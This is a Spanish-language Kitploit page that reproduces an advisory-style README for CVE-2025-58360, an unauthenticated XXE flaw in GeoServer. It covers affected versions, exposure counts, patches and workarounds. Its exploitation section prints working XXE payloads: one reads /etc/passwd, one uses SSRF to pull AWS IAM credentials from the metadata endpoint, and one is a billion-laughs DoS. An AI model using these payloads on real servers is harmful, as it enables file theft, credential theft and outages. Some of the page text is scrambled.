Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Blackash-CVE-2025-58360 — CVE-2025-58360 | Kitploit
Herramientas/GitHubGitHub/carlzhang123/blackash-cve-2025-58360
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubcarlzhang123/blackash-cve-2025-58360

Blackash-CVE-2025-58360

CVE-2025-58360

Ver Repositorio
hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔓 🛰️ 'CVE-2025-58360' El endpoint WMS de GeoServer es vulnerable a un ataque XXE 🌟

GeoServer

🏷️ Información básica

  • CVE ID: CVE-2025-58360
  • Publicado: 📅 25 de noviembre de 2025
  • Última modificación: 📅 25 de noviembre de 2025 (aún fresco al 26 nov)
  • Tipo de vulnerabilidad: XML External Entity (XXE) – CWE-611
  • Software afectado: GeoServer (servidor geoespacial de código abierto escrito en Java)
  • Severidad: 🔥 Alta – Puntuación base CVSS v3.1 7.5
    • Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L
  • Explotación activa: 🟡 Aún no observada (26 nov 2025) – pero circulan PoCs públicas
  • Autenticación requerida: ❌ Ninguna – completamente no autenticado
  • Interacción del usuario requerida: ❌ Ninguna

🎨 ¿Qué hace especial (y peligroso) a este fallo?

Este es un XXE clásico pero devastador en el endpoint GetMap del Web Map Service (WMS).
Los atacantes pueden:

  • 📂 Leer al que tenga acceso el proceso GeoServer (, , claves privadas, etc.)
Descargar herramienta
cualquier archivo
/etc/passwd
geoserver.xml
  • 🌐 Realizar Server-Side Request Forgery (SSRF) para escanear redes internas o acceder a endpoints de metadatos (ej. AWS/GCP)
  • 💣 Desencadenar Denegación de Servicio con ataques de expansión de entidades ("billion laughs")
  • 🔗 Potencialmente encadenar con otras fallas para RCE completo (no directo, pero posible en configuraciones incorrectas)
  • 🛡️ Versiones afectadas (Tabla detallada)

    ComponenteVersiones vulnerablesCorregido enEstado
    GeoServer Independiente2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.3, 2.25.6, 2.27.0🔴 Vulnerable
    Docker (osgeo/geoserver)2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.27.0🔴 Vulnerable
    Maven org.geoserver:gs-wms2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Vulnerable
    Maven org.geoserver.web:gs-web-app2.26.0 – 2.26.1
    ≤ 2.25.5
    2.26.2+, 2.25.6🔴 Vulnerable
    GeoServer 2.27.x y posteriores–Ya parcheado✅ Seguro

    🌍 Exposición global (en tiempo real al 26 nov 2025)

    FuenteInstancias expuestasNotas
    ZoomEye~49,400app:"GeoServer" search
    FOFA~24,000Resultados del último año
    Shodan~31,000Puerto 8080 + coincidencia de título
    GobySec~20,000Escaneo de red pública

    → ¡Son decenas de miles de servidores potencialmente vulnerables en internet abierto ahora mismo! 🌐

    🧨 Guía completa de explotación técnica

    Endpoint: POST /geoserver/wms
    Parámetro clave: SLD_BODY (permite estilo XML en bruto)
    Ruta de código vulnerable: El analizador XML no deshabilita la resolución de entidades externas → XXE clásico.

    f77f64d7c92fd31b29d537f5205da524

    Ejemplo 1 – Revelación de archivos (/etc/passwd)

    root@kitploit:~
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
      <sld:UserLayer>
        <sld:LayerFeatureConstraints>
          <sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
        </sld:LayerFeatureConstraints>
      </sld:UserLayer>
    </sld:StyledLayerDescriptor>
    

    → La respuesta contiene el contenido de /etc/passwd 🎉

    Ejemplo 2 – SSRF a metadatos internos (ejemplo AWS)

    root@kitploit:~
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
    

    → Filtra credenciales temporales de AWS si se ejecuta en EC2.

    Ejemplo 3 – DoS de billion laughs

    root@kitploit:~
    <!DOCTYPE lolz [
      <!ENTITY lol "lol">
      <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
      <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
      <!-- repeat up to lol9 -->
    ]>
    <lol>&lol9;</lol>
    

    → Consume gigabytes de RAM en segundos 💥

    🛠️ Parches oficiales y descargas

    VersiónFecha de publicaciónEnlace de descarga
    2.27.025 nov 2025https://geoserver.org/release/stable/
    2.26.325 nov 2025Parche de rama de mantenimiento
    2.25.625 nov 2025Rama soportada anterior

    Usuarios de Docker:

    root@kitploit:~
    docker pull osgeo/geoserver:2.27.0
    

    🔧 Soluciones alternativas (si no puedes parchear de inmediato)

    1. Bloquear XML peligroso con regla WAF/mod_security: Denegar solicitudes que contengan <!ENTITY o SYSTEM "file://
    2. Deshabilitar el parámetro SLD_BODY globalmente (si no es necesario)
    3. Ejecutar GeoServer con sistema de archivos de solo lectura + eliminar capacidades
    4. Poner detrás de un proxy inverso que elimine cuerpos XML para usuarios no autenticados

    📢 Referencias oficiales y PoCs

    • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-58360
    • GeoServer Advisory: https://github.com/geoserver/geoserver/security/advisories/GHSA-fjf5-xgmq-5525
    • JIRA Ticket: https://osgeo-org.atlassian.net/browse/GEOS-11682
    • Public Safe PoC (Python): https://gist.github.com/bolhasec/32fa035354d7cc9417aa297e2fe22b30
    • Plantilla de Nuclei (detección automática): Ya fusionada en la rama principal

    ⏰ Cronología

    FechaEvento
    Antes de nov 2025Descubierto autónomamente por el escáner XBOW AI
    25 nov 2025Divulgación coordinada → parches publicados
    25 nov 2025CVE asignado y publicado
    26 nov 2025PoCs se viralizan, los escaneos de exposición se disparan

    ✨ Palabras finales

    Este es un XXE de libro de texto que afecta a una plataforma geoespacial ampliamente desplegada con decenas de miles de instancias expuestas a internet. Los parches se publicaron el mismo día de la divulgación: ¡enorme reconocimiento al equipo de GeoServer por la rapidez! 🏆 Pero la ventana entre la disponibilidad del parche y la explotación masiva se está reduciendo rápidamente.

    Si ejecutas GeoServer → actualiza hoy.
    No te conviertas en el próximo titular.

    ¡Mantente seguro, mantente brillante! 🛡️✨